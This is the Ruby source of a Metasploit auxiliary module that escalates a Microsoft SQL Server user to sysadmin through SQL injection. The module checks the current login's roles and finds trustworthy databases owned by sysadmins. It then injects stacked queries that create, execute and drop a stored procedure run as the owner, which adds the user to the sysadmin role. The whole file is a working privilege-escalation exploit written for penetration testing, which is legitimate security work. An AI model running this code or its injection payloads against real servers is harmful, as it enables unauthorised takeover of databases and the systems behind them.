metasploit-framework/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb

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##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL_SQLI
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server - Escalate Db_Owner - SQLi',
'Description' => %q{
This module can be used to escalate privileges to sysadmin if the user has
the db_owner role in a trustworthy database owned by a sysadmin user. Once
the user has the sysadmin role the mssql_payload_sqli module can be used to obtain
a shell on the system.
Syntax for injection URLs:
Error: /account.asp?id=1+and+1=[SQLi];--
},
'Author' =>
[
'nullbind <scott.sutherland[at]netspi.com>'
],
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>'],
'License' => MSF_LICENSE,
'References' => [[ 'URL','http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx']]
))
end
def run
# Get the database user name
print_status("Grabbing the database user name from #{rhost}:#{rport}...")
db_user = get_username
print_good("Database user: #{db_user}")
# Grab sysadmin status
print_status("Checking if #{db_user} is already a sysadmin...")
sysadmin_status = check_sysadmin
if sysadmin_status == true
print_good("#{db_user} is already a sysadmin, no esclation needed.")
return
else
print_good("#{db_user} is NOT a sysadmin, let's try to escalate privileges.")
end
# Check for trusted databases owned by sysadmins
print_status("Checking for trusted databases owned by sysadmins...")
trust_db_list = check_trust_dbs
if !trust_db_list || trust_db_list.length == 0
print_error('No databases owned by sysadmin were found flagged as trustworthy.')
return
else
# Display list of accessible databases to user
print_good("#{trust_db_list.length} affected database(s) were found:")
if trust_db_list.length == 1
trust_db_one = trust_db_list.flatten.first
print_status(" - #{trust_db_one}")
else
trust_db_list.each do |db|
print_status(" - #{db[0]}")
end
end
end
# Check if the user has the db_owner role in any of the databases
print_status("Checking if #{db_user} has the db_owner role in any of them...")
dbowner_status = check_db_owner(trust_db_list)
if !dbowner_status
print_error("Fail buckets, the user doesn't have db_owner role anywhere.")
return
else
print_good("#{db_user} has the db_owner role on #{dbowner_status}.")
end
# Attempt to escalate to sysadmin
print_status("Attempting to add #{db_user} to sysadmin role...")
escalate_privs(dbowner_status,db_user)
sysadmin_status = check_sysadmin
if sysadmin_status == true
print_good("Success! #{db_user} is now a sysadmin!")
else
print_error("Fail buckets, something went wrong.")
end
end
#
# Functions
#
def get_username
# Setup query to check for database username
sql = "(select 'EVILSQLISTART'+SYSTEM_USER+'EVILSQLISTOP')"
# Run query
result = mssql_query(sql)
# Parse result
parsed_result =result.body.scan( /EVILSQLISTART([^>]*)EVILSQLISTOP/).last.first
# Return user name
return parsed_result
end
def check_sysadmin
# Setup query to check for sysadmin
sql = "(select 'EVILSQLISTART'+cast((select is_srvrolemember('sysadmin'))as varchar)+'EVILSQLISTOP')"
# Run query
result = mssql_query(sql)
# Parse result
parsed_result =result.body.scan( /EVILSQLISTART([^>]*)EVILSQLISTOP/).last.first
# Return sysadmin status
if parsed_result.to_i == 1
return true
else
return false
end
end
def check_trust_dbs
# Setup query to check for trusted databases owned by sysadmins
sql = "(select cast((SELECT 'EVILSTART'+d.name+'EVILSTOP' as DbName
FROM sys.server_principals r
INNER JOIN sys.server_role_members m ON r.principal_id = m.role_principal_id
INNER JOIN sys.server_principals p ON
p.principal_id = m.member_principal_id
inner join sys.databases d on suser_sname(d.owner_sid) = p.name
WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB') and r.type = 'R' and r.name = N'sysadmin' for xml path('')) as int))"
# Run query
result = mssql_query(sql)
#Parse results
parsed_result = result.body.scan(/EVILSTART(.*?)EVILSTOP/m)
end
def check_db_owner(trust_db_list)
# Check if the user has the db_owner role is any databases
trust_db_list.each do |db|
# Setup query
sql = "(select 'EVILSQLISTART'+'#{db[0]}'+'EVILSQLISTOP' as DbName
from [#{db[0]}].sys.database_role_members drm
join [#{db[0]}].sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join [#{db[0]}].sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
where rp.name = 'db_owner' and mp.name = SYSTEM_USER for xml path(''))"
# Run query
result = mssql_query(sql)
# Parse result
parsed_result =result.body.scan( /EVILSQLISTART([^>]*)EVILSQLISTOP/).last.first
# Return sysadmin status
if parsed_result
return parsed_result
end
end
nil
end
# Attempt to escalate privileges
def escalate_privs(dbowner_db,db_user)
# Create the evil stored procedure WITH EXECUTE AS OWNER
evil_sql_create = "1;use #{dbowner_db};
DECLARE @myevil as varchar(max)
set @myevil = '
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
as
begin
EXEC sp_addsrvrolemember ''#{db_user}'',''sysadmin''
end';
exec(@myevil);--"
mssql_query(evil_sql_create)
# Run the evil stored procedure
evilsql_run = "1;use #{dbowner_db};
DECLARE @myevil2 as varchar(max)
set @myevil2 = 'EXEC sp_elevate_me'
exec(@myevil2);--"
mssql_query(evilsql_run)
# Remove evil procedure
evilsql_remove = "1;use #{dbowner_db};
DECLARE @myevil3 as varchar(max)
set @myevil3 = 'DROP PROCEDURE sp_elevate_me'
exec(@myevil3);--"
mssql_query(evilsql_remove)
end
end